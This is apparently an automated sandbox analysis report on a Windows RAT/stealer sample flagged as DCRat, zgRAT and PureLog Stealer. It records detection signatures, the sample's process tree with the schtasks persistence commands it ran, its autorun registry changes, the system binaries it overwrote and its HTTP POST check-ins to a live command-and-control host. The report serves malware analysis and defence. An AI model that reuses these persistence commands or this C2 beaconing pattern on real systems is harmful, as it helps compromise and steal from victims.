Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe

Overview

General Information

Sample name:62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
Analysis ID:1467031
MD5:6667f954763eeacf7effcf5a5c25e695
SHA1:6db1fba1cd1181b921cdadeba24c69cd680be825
SHA256:62b1bf60394248d2c743ec6df0935d58e5009c9e04aab52da72ad712a57597b4
Tags:DCRatexe
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates autostart registry keys with suspicious names
Creates multiple autostart registry keys
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe (PID: 7704 cmdline: "C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe" MD5: 6667F954763EEACF7EFFCF5A5C25E695)
    • csc.exe (PID: 7196 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pb5w2chy\pb5w2chy.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 7268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 7436 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD41E.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC76655AD3B5B14A58A99CB3ECAE1D1A90.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • csc.exe (PID: 7500 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\k1wttop3\k1wttop3.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 3812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 7528 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD631.tmp" "c:\Windows\System32\CSC9D0BE8EB87641DFA2B4851BB05AFB2.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • schtasks.exe (PID: 7500 cmdline: schtasks.exe /create /tn "62b1bf60394248d2c743ec6df0935d58e5009c9e04aab6" /sc MINUTE /mo 9 /tr "'C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 7780 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\WAeZ9wWpbS.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 8104 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 8180 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
    • StartMenuExperienceHost.exe (PID: 7196 cmdline: "C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe" MD5: 6667F954763EEACF7EFFCF5A5C25E695)
  • upfc.exe (PID: 6960 cmdline: "C:\Program Files (x86)\java\jre-1.8\upfc.exe" MD5: 6667F954763EEACF7EFFCF5A5C25E695)
    • schtasks.exe (PID: 7556 cmdline: schtasks.exe /create /tn "llflCdrMcgGBl" /sc MINUTE /mo 8 /tr "'C:\Recovery\llflCdrMcgGB.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7696 cmdline: schtasks.exe /create /tn "llflCdrMcgGB" /sc ONLOGON /tr "'C:\Recovery\llflCdrMcgGB.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7864 cmdline: schtasks.exe /create /tn "llflCdrMcgGBl" /sc MINUTE /mo 14 /tr "'C:\Recovery\llflCdrMcgGB.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1240 cmdline: schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 8140 cmdline: schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 3468 cmdline: schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7292 cmdline: schtasks.exe /create /tn "llflCdrMcgGBl" /sc MINUTE /mo 6 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7504 cmdline: schtasks.exe /create /tn "llflCdrMcgGB" /sc ONLOGON /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7220 cmdline: schtasks.exe /create /tn "llflCdrMcgGBl" /sc MINUTE /mo 8 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5852 cmdline: schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 9 /tr "'C:\Program Files\7-Zip\Lang\upfc.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7540 cmdline: schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\upfc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 2112 cmdline: schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 5 /tr "'C:\Program Files\7-Zip\Lang\upfc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7560 cmdline: schtasks.exe /create /tn "62b1bf60394248d2c743ec6df0935d58e5009c9e04aab" /sc ONLOGON /tr "'C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7696 cmdline: schtasks.exe /create /tn "62b1bf60394248d2c743ec6df0935d58e5009c9e04aab6" /sc MINUTE /mo 6 /tr "'C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • upfc.exe (PID: 6764 cmdline: "C:\Program Files (x86)\java\jre-1.8\upfc.exe" MD5: 6667F954763EEACF7EFFCF5A5C25E695)
  • llflCdrMcgGB.exe (PID: 8152 cmdline: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe MD5: 6667F954763EEACF7EFFCF5A5C25E695)
  • llflCdrMcgGB.exe (PID: 7296 cmdline: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe MD5: 6667F954763EEACF7EFFCF5A5C25E695)
  • StartMenuExperienceHost.exe (PID: 7364 cmdline: "C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe" MD5: 6667F954763EEACF7EFFCF5A5C25E695)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Program Files (x86)\Java\jre-1.8\upfc.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Program Files (x86)\Java\jre-1.8\upfc.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Program Files (x86)\Java\jre-1.8\upfc.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                Click to see the 5 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000011.00000002.2485222023.00000000034FF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  00000000.00000002.1308539663.0000000012A69000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    00000000.00000000.1240706650.00000000003B2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      00000011.00000002.2485222023.000000000378E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        00000011.00000002.2485222023.0000000003076000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                          Click to see the 3 entries

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.0.62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe.3b0000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            0.0.62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe.3b0000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                              Sigma Signatures

                              System Summary

                              barindex
                              Sigma detected: Files With System Process Name In Unsuspected Locations
                              Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ProcessId: 7500, TargetFilename: c:\Windows\System32\SecurityHealthSystray.exe
                              Sigma detected: CurrentVersion Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files (x86)\java\jre-1.8\upfc.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, ProcessId: 7704, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc
                              Sigma detected: CurrentVersion NT Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files (x86)\java\jre-1.8\upfc.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, ProcessId: 7704, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                              Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pb5w2chy\pb5w2chy.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pb5w2chy\pb5w2chy.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe", ParentImage: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, ParentProcessId: 7704, ParentProcessName: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pb5w2chy\pb5w2chy.cmdline", ProcessId: 7196, ProcessName: csc.exe
                              Sigma detected: Dynamic CSharp Compile Artefact
                              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, ProcessId: 7704, TargetFilename: C:\Users\user\AppData\Local\Temp\pb5w2chy\pb5w2chy.cmdline

                              Data Obfuscation

                              barindex
                              Sigma detected: Dot net compiler compiles file from suspicious location
                              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pb5w2chy\pb5w2chy.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pb5w2chy\pb5w2chy.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe", ParentImage: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, ParentProcessId: 7704, ParentProcessName: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pb5w2chy\pb5w2chy.cmdline", ProcessId: 7196, ProcessName: csc.exe

                              Snort Signatures

                              Timestamp:07/03/24-16:42:09.488839
                              SID:2048095
                              Source Port:49707
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:07/03/24-16:43:02.458952
                              SID:2048095
                              Source Port:49785
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:07/03/24-16:43:34.748698
                              SID:2048095
                              Source Port:49830
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Antivirus / Scanner detection for submitted sample
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeAvira: detected
                              Antivirus detection for dropped file
                              Source: C:\Users\user\Desktop\FUSHtkHk.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Recovery\llflCdrMcgGB.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\Desktop\jjSkKJFG.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                              Source: C:\Recovery\llflCdrMcgGB.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\Desktop\PDlWdMMS.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\AppData\Local\Temp\WAeZ9wWpbS.batAvira: detection malicious, Label: BAT/Delbat.C
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\Desktop\rUKsZmvt.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                              Multi AV Scanner detection for dropped file
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeReversingLabs: Detection: 72%
                              Source: C:\Program Files\7-Zip\Lang\upfc.exeReversingLabs: Detection: 72%
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeReversingLabs: Detection: 72%
                              Source: C:\Recovery\llflCdrMcgGB.exeReversingLabs: Detection: 72%
                              Source: C:\Users\user\Desktop\PDlWdMMS.logReversingLabs: Detection: 70%
                              Source: C:\Users\user\Desktop\rUKsZmvt.logReversingLabs: Detection: 70%
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeReversingLabs: Detection: 72%
                              Multi AV Scanner detection for submitted file
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeReversingLabs: Detection: 72%
                              AI detected suspicious sample
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                              Machine Learning detection for dropped file
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeJoe Sandbox ML: detected
                              Source: C:\Recovery\llflCdrMcgGB.exeJoe Sandbox ML: detected
                              Source: C:\Recovery\llflCdrMcgGB.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\PDlWdMMS.logJoe Sandbox ML: detected
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\wlyrJHCD.logJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\AHphtSeX.logJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\rUKsZmvt.logJoe Sandbox ML: detected
                              Machine Learning detection for sample
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeJoe Sandbox ML: detected
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeDirectory created: C:\Program Files\7-Zip\Lang\upfc.exeJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeDirectory created: C:\Program Files\7-Zip\Lang\ea1d8f6d871115Jump to behavior
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: upfc.exe, 00000011.00000002.2534120131.000000001C7E3000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: 6C:\Users\user\AppData\Local\Temp\k1wttop3\k1wttop3.pdb source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, 00000000.00000002.1298963270.00000000030A6000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: 6C:\Users\user\AppData\Local\Temp\pb5w2chy\pb5w2chy.pdb source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, 00000000.00000002.1298963270.00000000030A6000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: System.pdb source: upfc.exe, 00000011.00000002.2534120131.000000001C7E3000.00000004.00000020.00020000.00000000.sdmp

                              Spreading

                              barindex
                              Infects executable files (exe, dll, sys, html)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeRenamed to system file: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile opened: C:\Users\userJump to behavior

                              Networking

                              barindex
                              Snort IDS alert for network traffic
                              Source: TrafficSnort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.10:49707 -> 188.114.97.3:80
                              Source: TrafficSnort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.10:49785 -> 188.114.97.3:80
                              Source: TrafficSnort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.10:49830 -> 188.114.97.3:80
                              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 384Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1756Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1056Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 154732Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1772Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
